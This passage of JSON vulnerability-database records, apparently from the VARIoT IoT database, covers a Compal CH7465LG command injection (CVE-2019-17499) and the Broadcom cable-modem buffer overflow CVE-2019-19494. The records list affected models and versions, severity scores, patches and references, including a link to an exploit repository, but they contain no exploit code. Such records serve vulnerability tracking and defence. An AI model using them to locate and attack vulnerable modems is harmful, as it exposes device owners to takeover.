"id": "CVE-2019-17499",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-36912",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"id": "VAR-201910-0684",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
}
],
"trust": 1.1555556
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
}
]
},
"last_update_date": "2024-11-23T22:11:48.022000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
},
{
"title": "Patch for Compal CH7465LG has an unknown vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/186673"
},
{
"title": "Compal CH7465LG Fixes for other vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=99330"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://gbti.pl/public/10_2019-compal.txt"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17499"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17499"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"date": "2019-10-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"date": "2019-10-11T11:15:10.107000",
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"date": "2019-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"date": "2024-11-21T04:32:23.017000",
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal CH7465LG In the device OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
}
],
"trust": 0.6
}
}
VAR-202001-0738
Vulnerability from variot - Updated: 2024-11-23 21:59Broadcom based cable modems across multiple vendors are vulnerable to a buffer overflow, which allows a remote attacker to execute arbitrary code at the kernel level via JavaScript run in a victim's browser. Examples of affected products include Sagemcom F@st 3890 prior to 50.10.21_T4, Sagemcom F@st 3890 prior to 05.76.6.3f, Sagemcom F@st 3686 3.428.0, Sagemcom F@st 3686 4.83.0, NETGEAR CG3700EMR 2.01.05, NETGEAR CG3700EMR 2.01.03, NETGEAR C6250EMR 2.01.05, NETGEAR C6250EMR 2.01.03, Technicolor TC7230 STEB 01.25, COMPAL 7284E 5.510.5.11, and COMPAL 7486E 5.510.5.11. plural Broadcom The base cable modem contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Sagemcom F@st 5260 and Sagemcom F@st 3890 are routers. Technicolor TC7230 STEB is a wireless router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0738",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tc7230 steb",
"scope": "eq",
"trust": 2.4,
"vendor": "technicolor",
"version": "01.25"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.05"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.03"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.05"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.03"
},
{
"model": "f\\@st 3890",
"scope": "lt",
"trust": 1.0,
"vendor": "sagemcom",
"version": "50.10.21_t4"
},
{
"model": "7284e",
"scope": "eq",
"trust": 1.0,
"vendor": "compal",
"version": "5.510.5.11"
},
{
"model": "f\\@st 3686",
"scope": "eq",
"trust": 1.0,
"vendor": "sagemcom",
"version": "3.428.0"
},
{
"model": "f\\@st 3890",
"scope": "lt",
"trust": 1.0,
"vendor": "sagemcom",
"version": "05.76.6.3f"
},
{
"model": "7486e",
"scope": "eq",
"trust": 1.0,
"vendor": "compal",
"version": "5.510.5.11"
},
{
"model": "f\\@st 3686",
"scope": "eq",
"trust": 1.0,
"vendor": "sagemcom",
"version": "4.83.0"
},
{
"model": "f@st 3890",
"scope": "lt",
"trust": 0.8,
"vendor": "sagemcom",
"version": "05.76.6.3f"
},
{
"model": "7284e",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "5.510.5.11"
},
{
"model": "7486e",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "5.510.5.11"
},
{
"model": "f@st 3890",
"scope": "eq",
"trust": 0.8,
"vendor": "sagemcom",
"version": null
},
{
"model": "f@st 3890",
"scope": "lt",
"trust": 0.8,
"vendor": "sagemcom",
"version": "50.10.21_t4"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.03"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.05"
},
{
"model": "f@st 3686",
"scope": "eq",
"trust": 0.8,
"vendor": "sagemcom",
"version": "3.428.0"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.05"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.03"
},
{
"model": "f@st 3686",
"scope": "eq",
"trust": 0.8,
"vendor": "sagemcom",
"version": "4.83.0"
},
{
"model": "f@st \u003c50.10.21 t4",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "3890"
},
{
"model": "f@st \u003c05.76.6.3f",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "3890"
},
{
"model": "f@st",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "36863.428.0"
},
{
"model": "f@st",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "36864.83.0"
},
{
"model": "compal 7486e",
"scope": "eq",
"trust": 0.6,
"vendor": "technicolor",
"version": "5.510.5.11"
},
{
"model": "compal 7284e",
"scope": "eq",
"trust": 0.6,
"vendor": "technicolor",
"version": "5.510.5.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"cve": "CVE-2019-19494",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-19494",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-23485",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-19494",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-19494",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-19494",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-19494",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-23485",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-311",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-19494",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Broadcom based cable modems across multiple vendors are vulnerable to a buffer overflow, which allows a remote attacker to execute arbitrary code at the kernel level via JavaScript run in a victim\u0027s browser. Examples of affected products include Sagemcom F@st 3890 prior to 50.10.21_T4, Sagemcom F@st 3890 prior to 05.76.6.3f, Sagemcom F@st 3686 3.428.0, Sagemcom F@st 3686 4.83.0, NETGEAR CG3700EMR 2.01.05, NETGEAR CG3700EMR 2.01.03, NETGEAR C6250EMR 2.01.05, NETGEAR C6250EMR 2.01.03, Technicolor TC7230 STEB 01.25, COMPAL 7284E 5.510.5.11, and COMPAL 7486E 5.510.5.11. plural Broadcom The base cable modem contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Sagemcom F@st 5260 and Sagemcom F@st 3890 are routers. Technicolor TC7230 STEB is a wireless router",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-19494",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-23485",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-19494",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"id": "VAR-202001-0738",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
}
],
"trust": 1.2474206366666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
}
]
},
"last_update_date": "2024-11-23T21:59:31.876000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.broadcom.com/"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2020/01/10/broadcom_cable_haunt_vulnerability/"
},
{
"title": "welivesecurity",
"trust": 0.1,
"url": "https://www.welivesecurity.com/2020/01/14/millions-modems-vulnerable-remote-hijacking/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/cable-haunt-remote-code-execution/151756/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/lyrebirds/cable-haunt-report/releases/download/2.4/report.pdf"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19494"
},
{
"trust": 1.7,
"url": "https://cablehaunt.com"
},
{
"trust": 1.7,
"url": "https://www.broadcom.com"
},
{
"trust": 1.7,
"url": "https://github.com/lyrebirds/fast8690-exploit"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/cable-haunt-remote-code-execution/151756/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"date": "2020-01-09T00:00:00",
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"date": "2020-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"date": "2020-01-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"date": "2020-01-09T13:15:10.993000",
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"date": "2020-01-28T00:00:00",
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"date": "2020-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"date": "2021-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"date": "2024-11-21T04:34:50.037000",
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Broadcom\u00a0 -Based cable modem vulnerable to classical buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
}
],
"trust": 0.6
}
}